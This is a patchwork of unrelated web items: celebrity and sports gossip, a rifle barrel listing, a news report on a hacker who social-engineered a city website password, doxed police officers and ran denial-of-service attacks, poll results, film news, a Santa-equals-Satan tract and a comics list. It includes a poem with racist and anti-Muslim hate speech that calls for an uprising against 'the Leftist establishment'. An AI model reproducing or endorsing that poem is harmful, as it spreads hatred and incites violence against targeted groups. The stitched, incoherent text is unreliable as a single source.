Instead Neville will be the main attraction at a sold-out question-and-answer session at his co-owned Hotel Football next to Old Trafford for 200 people paying £145 (juniors half price) each for the hospitality package.
Meanwhile, the Kersal Moor Residents' Association, set up in response to a new stadium for Salford City, are to field a candidate at the upcoming council election in response to their alleged lack of consultation before permission was approved.
The club is co-owned by Neville and his Class of 92 Manchester United team-mates. And the association also claim there has been no subsequent contact with residents as promised by Neville at the council meeting on December 15.
A Class of 92 spokeswomen said Neville was due to meet Salford locals on Monday.
Gary Neville will be attending a question-and-answer session before Manchester United's clash with Liverpool in the Premier League on Sunday
A good early test of the mettle of ITV's The Opening Show racing preview programme will be how successfully presenter Oli Bell can take wily Jockey Club chief executive Simon Bazalgette to task for his organisation's scandalous blueprint to turn historic Kempton Park into a housing estate.
Kroenke missing again
Arsenal owner Stan Kroenke, who watches his NBA basketball franchise side Denver Nuggets a lot more regularly than his Premier League outfit, was a conspicuous absentee from the Nuggets' appearance at the O2 this week.
It is understood Kroenke could not see them make their London debut because of NFL meetings in the US over the San Diego Chargers joining his LA Rams in Los Angeles.
Denver Nuggets owner Stan Kroenke was unable to watch his team play at the O2 Arena
The Association of Football Agents have been admirably transparent in an email to members from chairman Mike Miller.
The email revealed that after 207 intermediaries — as they are now called — signed up for the general meeting this week, only around half of them actually turned up for the summit in Elstree.
It meant pre-ordered food and drink went 'down the drain'. Ten per cent is the usual agents' rate.
Shameless Manchester City banned questions at manager Pep Guardiola's Press conference about this week's FA charge over breaching their anti-doping regulations.
They claimed it was a club rather than a Pep matter.
Yet a Guardiola-coached Barcelona were fined by UEFA in 2010 for failing to notify anti-doping officials of a change in training schedule.
Details
This high quality Bear Creek Arsenal barrel goes through its entire production life in Sanford, North Carolina at Bear Creek's facilities. Drilling, reaming, rifling, and turning are all accomplished on their CNC machines under ISO-9002 Quality Systems, allowing Bear Creek to put every barrel through a 100% inspection and air gauging process, ensuring every individual barrel is flawless before it leaves their facilities.
This 16", 1:8 twist, M4 contour barrel is machined from 416R stainless steel, heat treated to RC 28-32 hardness, and properly stress relieved. Chambered for 6.5 Grendel Type II, BCA expects that it, along with any of their barrels 16" or longer, will hold a 1.000 MOA group at 100 yards when used with appropriate ammo and shooting techniques.
Gas Port: Carbine, 0.072"
Safety Note: Choosing 6.5 Grendel comes with an added complication. There are “Type I” and “Type II” bolt/barrel specifications out there, and you CAN NOT mix and match parts for each of them without risk of damage and/or injury. Type II is by far the most popular configuration, but pay attention to what you are buying! A Type I bolt won't chamber rounds in a Type II barrel at all. Even worse, a Type II bolt mated to a Type I barrel will create excessive headspace and result in a rifle that is dangerous to fire.
The teen accused of online offences who is at the centre of the ongoing hacker confrontation involving city hall and Ottawa police had his court case set on Tuesday.
The youth, who cannot be identified because he is 16, will appear in court June 16. The trial is so far scheduled to last 10 days.
The teenager was arrested on May 8 and faces 60 charges based on complaints from California, Maryland, Florida, Connecticut and New York as well as police forces in Ottawa, Calgary, Halton Region and Quebec.
He is charged with “SWATing” activities, involving false calls to authorities that result in massive response, such as SWAT teams, to an address.
On Tuesday, a hacker who has targeted the City of Ottawa and its police force claimed to have downloaded “a ton of data” from the police website and said he is planning to release it.
But Ottawa police Chief Charles Bordeleau denied Monday night that there have been any security breaches or loss of data as a result of the hacker's “attempted disruptions.”
He also said that personal information posted by the hacker is readily accessible through other means and was not accessed by a breach to the server or system.
The hacker had previously posted home addresses and phone numbers for Ottawa police officers, including Bordeleau. The police chief would not confirm whether the addresses posted were accurate.
Bordeleau said the police website will remain offline until police are confident that the hacker's denial of service attack has stopped.
Calling himself “Aerith,” the hacker issued a statement to the media Monday evening. “We have prepared a lot of documents and will start releasing them to the media, directly, via email,” the statement says.
“We are the ones whom took out the Supreme Court, Ottawa Police, City of Ottawa, Toronto Police, Laval Police and more. We will be taking out more in the coming days, and we will not stop.”
In response to emailed questions from the Citizen, the hacker claimed to have emails and data from the police website. “We are planning on releasing part by part.”
The threatened release contradicts a message he emailed to the Citizen earlier Monday. Aerith said he had parted ways with the hacktivist group Anonymous because it wanted to do a massive police document dump. “That is not apart of our mission,” the hacker wrote.
Also earlier Monday, the hacker boasted he was able to commandeer the city's website only after the company that runs it gave him hints to guess a password.
He claims to have received the clues from a network technician after posing as a city manager who had lost his login information.
According to a log of the conversation posted online, the technician told him the password “looks like part of a physical address” and then said the address was in Ottawa and the word “Crescent” could follow it.
The hacker correctly guessed the password as “100 Constellation Cres.,” a City of Ottawa building in Centrepointe, and with that was able to instruct the technician to redirect the city's home page to another host server and a page displaying threatening messages and a dancing banana.
The developments were the latest in an often bizarre series of events that included attacks or threatened attacks on a number of websites over what the hacker claims are unjust accusations that an Ottawa teenager was behind a mischief campaign to send police emergency services on false calls in several provinces and U.S. states.
“The police have framed an innocent youth, and failed to investigate the crimes and furthermore, they have failed to provide any shred of solid proof,” said Aerith in a statement published online Monday.
The city would not respond Monday to the hacker's password claims, but Mayor Jim Watson told reporters that personal information was never at risk and the city took its site down itself until it could be repaired.
“This is a serious matter and it is criminal activity,” Watson said.
Several other websites, including the Ottawa Police Service, Supreme Court of Canada, City of Toronto and City of Laval, went down for varying periods after the hacker threatened to target them. The Supreme Court said it took its systems off-line over the weekend to make sure they had not been compromised. It was unclear whether the others were also taken down as a precaution.
“We have a team of investigators working diligently at identifying exactly what the source of the problem is from a technical perspective,” Bordeleau said. “Our websites and our systems remain secure.”
The FBI and well-known Internet security researcher Brian Krebs were involved in the investigation of the Ottawa teen. Krebs said he was drawn in when someone sent police to his home in early April to deal with a supposed hostage-taking. It was then he turned his attention to identifying the person.
The hacker claims the teen's IP address was faked by a sex criminal in New Jersey.
The teen's father, a computer programmer, told reporters at a news conference Sunday that Anonymous had found new evidence that will prove his son's innocence.
He also showed reporters what he believes are two listening devices planted in light bulbs in his home, which he said he found after being warned by the hacker group that there were “audio signals” coming from his house.
Anonymous is known for spearheading social causes and advancing protests through “hacktivism,” in which computer systems are accessed, often illegally, to uncover information about controversial issues.
Gabriella Coleman, a McGill University professor who has become an intermediary for the hacking collective, said one official cell of the group has already denied any connection to Aerith. No other Anonymous element has claimed him as its own.
“There is a great amount of established Anonymous groups and networks in existence and the great majority of operations we see emanate from those established groups. This is not one of those cases,” said Coleman, who holds the Wolfe chair in scientific and technological literacy at McGill.
Checking Facebook at work is a no-no for most. But not for the 100,000 RBS employees who are now told to do exactly that.
The Royal Bank of Scotland is signing its workers up for Facebook At Work, the social network's office version. RBS (RBS) is the first bank to start using the service, and the biggest company to sign up so far.
RBS employees will be able to use all the normal Facebook (FB) features, but their professional profiles will be separate from their private accounts. The bank said information shared between its employees will only be accessible to other people within the bank.
RBS said it will roll out the service to around 30,000 of its employees by March, and is hoping all of its 100,000 staff will be using it by the end of next year.
The bank did not reveal how much it's paying to use the network.
Related: Facebook stock at all-time high of $102
"I've already been using Facebook At Work while we test it and it's been so useful , allowing me to exchange information and ideas quickly and securely with all my team on a wide range of projects," said Simon McNamara, RBS chief administrative officer.
Facebook is hoping the service will change the way it is perceived by other tech companies. The Facebook at Work platform makes it a direct competitor to LinkedIn (LNKD), Microsoft (MSFT), Google (GOOG), IBM (IBM), as well as start ups like the productivity platform Slack.
The service launched in January and Facebook said it is already used by around 300 businesses.
WASHINGTON, DC -- Republicans' ratings of their lives worsened significantly in November, with their collective Life Evaluation Index score dropping to 40.3, from 47.0 in October. Independents' life ratings also declined last month, but to a lesser degree. Democrats became slightly more upbeat -- their Life Evaluation Index score climbed to 56.9, from 53.7 in October.
Democrats' life ratings have been generally improving in 2012, while Republicans' have been mostly on the decline. The trajectory of independents' life ratings is more similar to the trend for Republicans than that of Democrats.
The gap between Democrats and Republicans on the Life Evaluation Index is now 16.6 points -- the largest it has ever been. This is also a drastic change from early 2008, when Republicans' life ratings frequently surpassed Democrats' by more than 10 points.
These data show a clear, although complex, relationship between political views and life ratings. In 2008, when a Republican -- George W. Bush -- was in the White House, Republicans' life ratings far surpassed those of Democrats. This began to change when President Barack Obama took office in January 2009. Interestingly -- and perhaps because of the compounding effects of the financial crisis -- Republicans' life ratings did not decline as significantly nor did Democrats' ratings increase as much in November 2008, when Obama won his first term in office, as they did this November.
Democrats' and Republicans' life ratings generally remained relatively close through most of Obama's first term -- Democrats did not become much more positive. This may have been due to the recession and economic crisis -- the effects of these issues on everyone's life outlook seem to have far outweighed any political bonus Democrats might have otherwise experienced at the time.
The two groups began to diverge again in February of this year. Democrats started to become much more optimistic, while Republicans got more pessimistic. Why this happened at the end of Obama's first term and amid a heated presidential election season is unclear. It could be that Democrats felt more hopeful about their candidate than Republicans did about GOP nominee Mitt Romney. Gallup found in three separate polls conducted in May, August, and October that Democrats were more likely to think Obama would win in November than Republicans were to think Romney would win.
The Life Evaluation Index is part of the Gallup-Healthways Well-Being Index and is calculated off of how Americans rate their current and future lives on a ladder scale with steps numbered from 0 to 10 based on the Cantril Self-Anchoring Striving Scale.
The exact questions are:
Please imagine a ladder, with steps numbered from 0 at the bottom to 10 at the top. The top of the ladder represents the best possible life for you and the bottom of the ladder represents the worst possible life for you. On which step of the ladder would you say you personally feel you stand at this time?
Please imagine a ladder, with steps numbered from 0 at the bottom to 10 at the top. The top of the ladder represents the best possible life for you and the bottom of the ladder represents the worst possible life for you. Just your best guess, on which step do you think you will stand in the future, say about five years from now?
The decline in Republicans' overall Life Evaluation Index score is due entirely to a drop in how they rate their future life. Republicans became much more pessimistic in November about how good they think their lives will be five years from now. They rated their lives five years from now an average of 7.0 last month -- the lowest for this group on record.
Republicans' future life rating also now about matches their current life rating of 6.9. This is out of synch with the typical pattern -- most people tend to rate their future life higher than their current life.
Overall, Americans' Life Ratings Sink to 13-Month Low
Fueled by Republicans' and independents' declining ratings, Americans' collective Life Evaluation Index score fell for the third month in a row to 47.2 in November, the lowest since October of last year.
The current decline mirrors the downward trend found in August and September of 2011 amid tough debt ceiling negotiations and the related downgrading of the U.S. credit rating.
Americans' life ratings remain better than the lows seen during the 2008/2009 financial crisis, but are lower than the all-time high of 51 recorded in January 2011.
Gallup classifies Americans who rate their current life a 7 or higher and their future life an 8 or higher as "thriving." Respondents are classified as "suffering" if they rate their current life 0 to 4 and their future life 0 to 4. Those who are neither "thriving" nor "suffering" are classified as "struggling."
The percentage of Americans who rate their lives poorly enough to be considered suffering rose to 4.1% in November -- the highest level since March 2009. At that time, fewer Americans were thriving and more were struggling.
Americans rated their current lives an average of 6.9 in November and future lives an average of 7.6.
Bottom Line
Americans in general are becoming more pessimistic about their lives, but it is Republicans in particular whose outlook is worsening. In the same month that their opposing party's candidate clinched a re-election victory, Republicans' average Life Evaluation Index score dropped nearly seven points. Democrats, however, became more positive in November -- creating a larger-than-ever divide in how members of the two parties view their lives.
The unknown outcome of the fiscal cliff situation may also be contributing to Republicans' worsening views of their future lives, as they may feel less confident than Democrats that their party leaders will have the leverage to obtain what they want. The eventual compromise -- or lack thereof -- will likely have an effect in some way on how all Americans feel about their lives. Whether it leaves Democrats or Republicans -- or neither -- feeling better, will depend on the details.
About the Gallup-Healthways Well-Being Index
The Gallup-Healthways Well-Being Index tracks well-being in the U.S., U.K., and Germany and provides best-in-class solutions for a healthier world. To learn more, please visit well-beingindex.com.
The Pokémon cartoon has been very successful on television in all territories, capturing the minds of viewers young and old. Each year, there is also one new Pokémon movie that usually centers around a particular legendary or special Pokémon, but these are usually fairly small scale releases. Outside of Japan, these Pokémon animated movies rarely are shown in theaters, but it seems that the Pokémon Company may have big plans for its IP coming to the silver screen around the world.
The Hollywood Reporter claims that Legendary Entertainment is currently poised to acquire the film right to produce a big budget, live action Pokémon movie. Sony and Warner Bros. are also seriously interested, but it looks like Legendary is the one that will be scooping it up. Legendary's latest notable release was 2014's Godzilla reboot, produced alongside Warner Bros. and Toho Co, so it already has some connections to the Japanese film industry. Of course, Warner Bros. is still being given special consideration, too, after it was responsible for distributing the first three animated films in the west. Naturally, none of this is set in stone until one of these companies confirms it officially, but it wouldn't be surprising given the franchise's popularity and 20th anniversary.
What do you think? Would you like to see a live action Pokémon movie? Which company do you think will win out? Share your thoughts in the comments below.
As payment solutions proliferate and calls for standardization mount, Israel-based payment platform startup Zooz said it has closed a $24 million led by Target Global Ventures, to expand globally and bolster its products and services.
Zooz's series C round more than doubles the total amount invested in the company to $40.5 million, raised in four rounds. The latest round included Fang Fund, iAngels, Kreos Capital and existing investors Blumberg Capital, lool ventures, Rhodium, Claltech (Access Industries' Israeli tech vehicle), XSeed Capital, CampOne Ventures and angel investor Eilon Tirosh.
“We are opening sales and tech support offices in Berlin and San Francisco. We are also you going to invest more in business intelligence that relate to payments and better optimization of data. We are also looking to go from 80 to 120 employees in a year's time. Sales and tech support in both cities,” said Ronen Morecki, co-founder and CTO of Zooz.
Primarily targeting developers for both mobile and desktop, Zooz provides a payments platform designed to help merchants reduce the rate of international cards being rejected.
“We know to route to the right payment processor, increasing the chances of the card being accepted.”
Zooz wants to be in Germany for the country's massive growth potential. The company is seeking new retailers and Europe's largest economy is fertile ground for expansion.
According to ATKearny's Global Retail Index, Germany is the second largest online market in Europe with almost triple the UK's current growth potential.
The same report predicts that European online retail sales will reach 234€ billion by 2018 and almost half of all online retail sales across the EU will be from online purchases made using a smartphone or tablet by 2018.
“We believe that the German market is highly advanced in eCommerce and many other retailers in Europe are interested in the German market. So it makes sense for us to follow their lead, said Morecki.
Europe doing the right thing
While Zooz is not directly competing with banks, it is banking on the success of deregulation and the expansion of unified standards globally. In fact, the company's expansion into Europe plays out against a backdrop of the EU's planned revised Payment Services Directive (PD2), which is intended to open up the market to new players.
“PSD2 will fundamentally change the game for consumers, banks and third party providers by opening up the market in the same way that the app stores did for mobile phones. With PSD2, third party providers can develop new services on top of existing bank infrastructure that never would have been developed otherwise,” said Erik Engellau-Nilsson, Vice President at Klarna.
According to Uri Rivner from BioCatch, a provider of behavioral authentication, one of the points the directive addresses is electronic payment security in the EU, making online payments safer and more secure.
Payment service providers will be liable for any fraud related issue and will have to be accredited on a yearly basis. Securing the payment ecosystem means a relatively fast, friction-free and unified solution for all.
“The European Commission understands that new payment features are added – purchasing from a new mobile device, first-time customer, applying for a new account – features that up till recently were not addressed, and therefore the need for a regulation is crucial,” said Rivner.
Lack of standardization
One of the biggest hurdles in mainstream adoption and growth in mobile and digital payments is lack of standardization.
There are a multitude of competing platforms, networks, service providers, point of sale technologies, and retailer strategies, including Apple Pay, Samsung Pay, PayPal, Square, Softcard, Walmart Pay, Venmo, just to name a few. Ensuring that there are compliant, secure standards across the board and that solutions are compatible across different channels – online and in-store – will be critical to mass acceptance.
“All parties involved in the payment lifecycle, from retailers to service providers to regulatory bodies, must coordinate to develop consistent and compatible solutions that keep the customer's needs – convenience and security – at the heart of the conversation,” said Leo Loomie, VP at Digital Risk, a data analytics and compliance solutions provider to large financial institutions.
The biggest hurdle for Ben Affleck as Batman in ‘Batman V Superman: Dawn Of Justice' is going to be not just matching but eclipsing Christian Bale's turn as the Dark Knight in Christopher Nolan's beloved trilogy.
But before the rather divisive decision was made to cast the former ‘Daredevil' actor as Bruce Wayne it was widely speculated that Zack Snyder was hounding Christian Bale to reprise his role for ‘Batman V Superman: Dawn Of Justice'.
It's now been revealed that rumour was only half true, because Snyder has confessed that he wanted Bale in the ‘Man Of Steel' sequel, but in a completely different role to Batman.
Snyder admitted to Film Ink that this would have been the ultimate proof that ‘Batman V Superman: Dawn Of Justice' was in a completely different universe and reality to ‘Batman Begins', ‘The Dark Knight', and ‘The Dark Knight Rises'.
“This is a total and opposite reality from the Chris Nolan movies,” Zack Snyder remarked. “It's another universe, so we couldn't hire Christian Bale if we wanted to, because he doesn't exist in our world. Maybe we could hire him to play another part. We did talk about that briefly. I just wanted to hire Christian to play another part to make that obvious.”
Zack Snyder then joked that Bale could have been plastered with make-up and then portrayed Alfred Pennyworth, a role that Jeremy Irons has in ‘Batman V Superman: Dawn Of Justice.'
Snyder also admitted that some folks over at Warner Bros. asked him who he'd be bringing back from Christopher Nolan's Batman films, to which he'd have to explain, “In the Batman universe that Chris Nolan created, Superman would have a hard time existing.”
While casting Christian Bale in ‘Batman V Superman: Dawn Of Justice' would have been roundly celebrated, the instant revelation that he wasn't playing the Caped Crusader would have felt like a kick in the nards to moviegoers across the world.
Also, if it had happened, it would have been virtually impossible for Ben Affleck to emerge from Christian Bale's shadow especially if the actor was stood it in half the time. Thankfully Zack Snyder's consideration that Christian Bale should appear in ‘Batman V Superman: Dawn Of Justice' in another role was as brief as it was stupid, and all parties have moved on.
The Christian Bale-less ‘Batman V Superman: Dawn Of Justice' will finally be released at the end of this month on March 25.
Read more:
- Watson: Calling me a ‘feminazi' won't stop me
- Leslie Jones defends Ghostbusters character
- Why is everyone talking about this pic of DiCaprio?
[Image via Warner Bros.]
They say that we're the racists
As they spit upon the ground
But it was their hate for whitey
That shot the Dallas cops down
They say that we're the devil
Of the very world we built
And then attempt to shame us
With “white privilege” and guilt
Muslim imams proudly preach
For the mass rape of our women
Black social leaders call out
For the slaughter of our children
These things are not imagined
They are happening right now
With most of us in shock
And simply asking “how?”
How is it that it's come to this?
Where have our leaders been?
Their failure to protect us
Has been their gravest sin
So now the Folk must rise up
Take our fate into our hands
Destroy the Leftist establishment
Now we must seize command
We will not go silent into the night
Like sheep sent to their slaughter
The Northern wolf will show his might
To protect our sons and daughters
© Karlotta Imrichova 2016
*
1 .
Annetta K. Story, a graduate student at Regent University, is conducting a study on certain potential moderating factors of the relationship between authentic leadership and followers' trust of the leader. Annetta Story has explained to me the purpose of this research and the intended outcome. I understand that I will be asked to complete the following questionnaire. My participation in this study should take a total of about 10 minutes. I understand that anonymity will be preserved with regard to my responses and that my name will not be associated with any results of this study. I know that I may refuse to answer any question asked and that I may discontinue participation at any time.
Potential risks resulting from my participation in this project have been described to me. I am aware that I may seek further information about this study by contacting Annetta Story at annesto@regent.edu.
I am aware that I must be at least 18 years of age to participate. My completion of the survey signifies my voluntary participation in this project.
The modern-day Santa Claus is an American version of Saint Nicholas, a fourth century Roman Catholic bishop from Asia Minor who was noted for his good deeds and gift giving. This tradition first spread throughout Europe, and then found its way to America by the early Dutch settlers. Since God's word warns us to BEWARE of tradition (Col. 2:8), we shouldn't be surprised to find the Devil right in the middle of the world's most celebrated holiday. Lucifer's desire has always been to dethrone God and exalt himself (Isa. 14:12-15). He desires worship (Luke 4:7; II Ths. 2:3-4). Perhaps you've never thought of it, but please note how Satan robs the Lord Jesus Christ of His glory by spreading the Santa Claus tradition... SANTA IS ETERNAL
A child knows nothing of his beginning. To a child, Santa has just always existed. JESUS CHRIST IS ETERNAL
"I am Alpha and Omega, the beginning and the ending, saith the Lord, which is, and which was, and which is to come, the Almighty." (Rev. 1:8) SANTA LIVES IN THE NORTH
Tradition holds that Santa Claus lives at the North Pole, a place ABOVE the rest of us. JESUS CHRIST LIVES IN THE NORTH
"Beautiful for situation, the joy of the whole earth, is mount Zion, on the sides of the north, the city of the great King." (Psa. 48:2) SANTA WEARS RED CLOTHING
Santa wears a red furry suit. JESUS CHRIST WEARS RED CLOTHING
"And he was clothed with a vesture dipped in blood: and his name is called The Word of God." (Rev. 19:13) SANTA HAS WHITE HAIR
Santa is always pictured as an old man with white hair like wool. JESUS CHRIST HAS WHITE HAIR
"His head and his hairs were white like wool, as white as snow; and his eyes were as a flame of fire;" (Rev. 1:14) SANTA FLIES AROUND GIVING GIFTS
Santa has the ability to defy the laws of gravity and fly around giving gifts to people. JESUS CHRIST ASCENDED AND GAVE GIFTS UNTO MEN
"But unto every one of us is given grace according to the measure of the gift of Christ. Wherefore he saith, When he ascended up on high, he led captivity captive, and gave gifts unto men." (Eph. 4:7-8) SANTA IS COMING SOON
During the Christmas season it is emphasized over and over that "Santa is coming". JESUS CHRIST IS COMING SOON
"He which testifieth these things saith, Surely I come quickly. Amen. Even so, come, Lord Jesus." (Rev. 22:20) SANTA IS OMNISCIENT
Children are taught that Santa "knows when you've been good, and he knows when you've been bad". JESUS CHRIST IS OMNISCIENT
"The eyes of the LORD are in every place, beholding the evil and the good." (Pro. 15:3) "And Jesus knowing their thoughts said, Wherefore think ye evil in your hearts?" (Mat. 9:4) SANTA IS OMNIPRESENT
Santa must be omnipresent, because he has the ability to visit over a billion homes in a twenty-four hour period. That's over 1100 per second! JESUS CHRIST IS OMNIPRESENT
"For where two or three are gathered together in my name, there am I in the midst of them." (Mat. 18:20) SANTA IS OMNIPOTENT
He has the ability to carry presents for over a billion children. JESUS CHRIST IS OMNIPOTENT
"And Jesus came and spake unto them, saying, All power is given unto me in heaven and in earth." (Mat. 28:18) SANTA HAS SPIRIT HELPERS CALLED ELVES
Webster, 1828: "ELF...a spirit, the night-mar; a ghost, hag, witch" JESUS CHRIST HAS SPIRIT HELPERS CALLED ANGELS
"Then the devil leaveth him, and, behold, angels came and ministered unto him." (Mat. 4:11) SANTA - SANAT - SATAN? Sanat Kumara is worshipped by some new age groups as God. H.P. Blavatsky, the mother of the new age movement, said on page 350 of her book, The Secret Doctrine, Vol. 2: "The name isn't important. It is the letters". "Santa" has the same letters as "Satan"! According to G.A. Riplinger, "Ole Nick" is listed as the name of a fallen angel in the Dictionary of Fallen Angels. (New Age Bible Versions, Gail Riplinger, pg. 53) Friend, don't glorify Satan by giving the glory and attributes of Jesus Christ to Santa Claus! Santa is a COUNTERFEIT GOD, and you are honoring Satan when you teach your children to believe in Santa! Christians should teach their children the TRUTH. We should glorify God by teaching our children about Jesus Christ and His saving grace!
Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings.
May 1, 2014, 4:57 AM GMT
By NBCBayArea.com
The couple whose Victorian house has drawn neighbors' ire for its whimsical Disney-style paint job are now being sued by a neighbor who claims their remodeling dumped toxic lead into her yard.
Sarah Doty filed the lawsuit after a judge denied an injunction to stop the remodel.
“The federal government came to my house and did testing that showed high levels of lead,” Doty said. “I had additional testing done by the California Department of Health which tested lead in the tens of thousands of times above the legal limit. So my yard is contaminated.”
The attorney representing the homeowners denied all allegations against his clients.
The couple who owns the house, Hosam Haggog and Fatima Rahman, said they chose the color scheme for the house in Santa Clara's Quad neighborhood because their daughters love the animated movie “Up."
Neighbors attempted to stop the remodel of the home with hopes of keeping the Victorian in its original "historic" look. The neighborhood association board member said the problem is the new paint masks an "ugly truth."
“It's not the color, it's absolutely not the color, it's about making sure that people follow safe procedures when they remodel their houses,” said Sudhanshu Jain of the Old Quad Residents Association.
The neighborhood association also questions the city's permit process and code enforcement. Several neighbors are suing the city over it.
While the neighborhood is divided on the paint and the historical correctness – and even the lead concern – many of the neighbors said they are ready to move on.
“He just wants to live in his house, just let him live in his house,” Diana Mendoza said.
More From NBC Bay Area
Dear #Pakistani followers my Insta timeline is not a Jung-e-maidaan pls note this is a war AGAINST TERROR,not against YOU,like it or not it's gnawing at ur roots too,so consider @IAF_MCC attacks as a favour,if the weeds in ur backyard will creep into ours we WILL take action !
My next film is a tribute to Rituparno Ghosh: Celina Jaitly Haag Kolkata girl Celina Jaitly Haag is back in the city after a decade. The former Miss India, who started her modelling career in Kolkata, is making a comeback with Ram Kamal Mukherjee's Hindi film, Season's Greetings, the shooting for which has brought the former Wood ... Kolkata girl Celina Jaitly Haag is back in the city after a decade. The former Miss India, who started her modelling career in Kolkata, is making a comeback with Ram Kamal Mukherjee's Hindi film, Season's Greetings, the shooting for which has brought the former Wood ...
I feel every voice deserves a platform, provided the voice is genuine: Celina After a gap of seven years, former Miss India and Bollywood actress Celina Jaitly Haag will be staging a comeback. She will be replacing Paoli in Ram Kamal Mukherjee's Hindi film titled Season's Greetings, which is a tribute to Rituparno Ghosh. Perhaps this is the country's ... After a gap of seven years, former Miss India and Bollywood actress Celina Jaitly Haag will be staging a comeback. She will be replacing Paoli in Ram Kamal Mukherjee's Hindi film titled Season's Greetings, which is a tribute to Rituparno Ghosh. Perhaps this is the country's ...
ANNOUNCING THE BITTERSWEET ARRIVAL OF OUR 2nd SET OF TWINS When it rains look for rainbows, when it's dark look for stars... My dearest friends, beloved fans and followers. On the auspicious occasion of Dusshera we would like to take this opportunity to share with you all the following bittersweet news. The Gods above have blessed ... When it rains look for rainbows, when it's dark look for stars... My dearest friends, beloved fans and followers. On the auspicious occasion of Dusshera we would like to take this opportunity to share with you all the following bittersweet news. The Gods above have blessed ...
It's been a staple of science fiction for decades, and now scientists are looking into the viability of real-life stasis-esque technology that could be the missing link to exploring our solar system.
Space reports that the firm SpaceWorks Enterprises is looking into the usefulness of hibernation technology that could allow a crew of up to 100 astronauts to sleep during the months-long trip to somewhere like Mars. The company's principal investigator, John Bradford, talked about the concept at NASA's recent 2016 Innovative Advanced Concepts (NIAC) symposium.
It'll take 6-9 months for humans to reach Mars using current propulsion tech, so Bradford's team is looking into ways to keep astronauts in a “hypothermic stasis,” which could potentially cut their metabolic rates by 50 to 70 percent. Part of the equation involves lowering their body temperatures by approximately 9 degrees Fahrenheit. Bradford said the approach could reduce the need for consumables in nutrition, hydration and oxygen demand.
Along with reducing the need for equipment and food on the mission, this approach could also reduce the amount of space needed to transport a larger amount of people. So, theoretically, we could carry dozens and dozens of would-be settlers out into the solar system. Instead of sending teams of 4-5 people at a time, which isn't exactly the most promising way to spread humanity to the stars.
The team is looking to current health methods of “therapeutic hypothermia” already being used in hospitals (typically to allow a person to recover from an injury) as a jumping-off point. It's not exactly a straight-up stasis pod, but it's certainly a first step in that direction.
Zoom In
(Via Space)
A mix of 2016 and prior releases, here are my favorite comic book reads of this past year in no particular order…
MY FAVORITE GRAPHIC NOVELS OF 2016…
Replica (vol. 1) written by Paul Jenkins, art by Andy Clarke – Aftershock Comics
Meet Trevor Churchill, an Earth-born peacekeeping agent on the intergalactic hub known as The Transfer. When Trevor's already near impossible assignment becomes a bit too much for the errant detective, he turns to the only logical approach, REPLICATION. More of a good thing can't hurt, right? A single clone could be helpful; unfortunately the replication process doesn't go as planned!
The Fix (vol. 1) written by Nick Spencer, art by Steve Lieber – Image Comics
THE FIX is a story of the crooked cops, scheming mobsters, and corrupt politicians that run Los Angeles-and the sex toy that can bring them all down. Oh, and the hero is a drug-sniffing beagle named Pretzels.
Jupiter's Circle (vol. 2) written by Mark Millar, art by Bill Sienkiewicz and Alfredo Torres – Image Comics
In mid-century America, the world's greatest superheroes triumph in their public battles, while struggling with private ones. Social and political unrest take a personal toll as suspicion and betrayal cast a shadow over the most trusted friendships.
Teen Titans: The Judas Contract written by Marv Wolfman, art by George Perez – DC Comics
They were Earth's teenage defenders–unbeatable and unstoppable. Riding high, they took an eighth member–a young girl–into their ranks. She was their downfall. From the retirement of Robin and Kid Flash, to the birth of Nightwing and the introduction of Jericho, to the ultimate betrayal of a Titan–“The Judas Contract” still has fans talking today!
Wrinkles written and illustrated by Paco Roca – Fantagraphics
Retired bank manager Emilio, suffering from Alzheimer's, is taken to an assisted living home by his son. He befriends his roommate Miguel, an overconfident ladies' man. Together, they employ clever tricks to keep the doctors from noticing Emilio's ongoing deterioration ― and keep him from being transferred to the dreaded confinement of the top floor of the facility. (“Better to die than to end up there.” Their determination to stay active as individuals and maintain their dignity culminates in an adventurous escape.
Bitch Planet (vol. 1) written by Kelly Sue DeConnick, art by Valentine De Landro – Image Comics
In a future just a few years down the road in the wrong direction, a woman's failure to comply with her patriarchal overlords will result in exile to the meanest penal planet in the galaxy. When the newest crop of fresh femmes arrive, can they work together to stay alive or will hide agendas, crooked guards, and the deadliest sport on (or off!) Earth take them to their maker?
Jupiter's Legacy (vol. 1) written by Mark Millar, art by Frank Quitely – Image Comics
The children of the world's greatest superheroes may never be able to fill their parents' shoes. When the family becomes embattled by infighting, one branch stages an uprising and another goes into hiding. How long can the world survive when one family's super-powered problems explode onto the global stage?
Dark Knight: A True Batman Story written by Paul Dini, art by Eduardo Risso –Vertigo
This is a Batman story like no other-the harrowing and eloquent autobiographical tale of writer Paul Dini's courageous struggle to overcome a desperate situation.
The Caped Crusader has been the all-abiding icon of justice and authority for generations. But in this surprising original graphic novel, we see Batman in a new light-as the savior who helps a discouraged man recover from a brutal attack that left him unable to face the world.
Divinity written by Matt Kindt, art by Trevor Hairsine – Valiant Comics
At the height of the Cold War, the Soviet Union – determined to win the Space Race at any cost – green lit a dangerously advanced mission. They sent a man farther into the cosmos than anyone has gone before or since. Lost in the stars, he encountered something unknown. Something that…changed him.
Long thought lost and erased from the history books, he has suddenly returned, crash-landing in the Australian Outback. The few that have been able to reach him believe him to be a deity – one who turned the scorched desert into a lush oasis. They say he can bend matter, space, and even time to his will. Now the rest of the world's powers must decide for themselves – will the enigmatic Divinity offer his hand in friendship, or will Earth's heroes find themselves helpless against the wrath of the divine?
Daredevil: Born Again written by Frank Miller, art by David Mazzucchelli – Marvel Comics
“And I — I have shown him… that a man without hope is a man without fear.” The definitive Daredevil tale! Karen Page, Matt Murdock's former lover, has traded away the Man Without Fear's secret identity for a drug fix. Now, Daredevil must find strength as the Kingpin of Crime wastes no time taking him down as low as a human can get.
Roche Limit (vol. 3) written by Michael Moreci, art by Kyle Charles – Image Comics
Earth is in ruins after the Black Sun's annihilation of the planet. Now, in the last remaining human city, its inhabitants fight for survival, while a chosen few realize that their world may not be what it seems.
MY FAVORITE COMIC BOOK SERIES OF 2016…
4 Kids Walk Into A Bank written by Matthew Rosenberg, art by Tyler Boss – Black Mask Studios
A FUN(ISH) CRIME CAPER ABOUT CHILDREN! 11 year old Paige and her weirdo friends have a problem: a gang of ex-cons need her dad's help on a heist… the problem is those ex-cons are morons. If Paige wants to keep her dad out of trouble, she's going to have to pull off the heist herself. Like Wes Anderson remaking RESERVOIR DOGS, 4KWIAB is a very dark & moderately humorous story about friendship, growing up, d & d, puking, skinheads, grand larceny, & family.
Tumor written by Joshua Hale Fialkov, art by Noel Tuazon – Oni Press
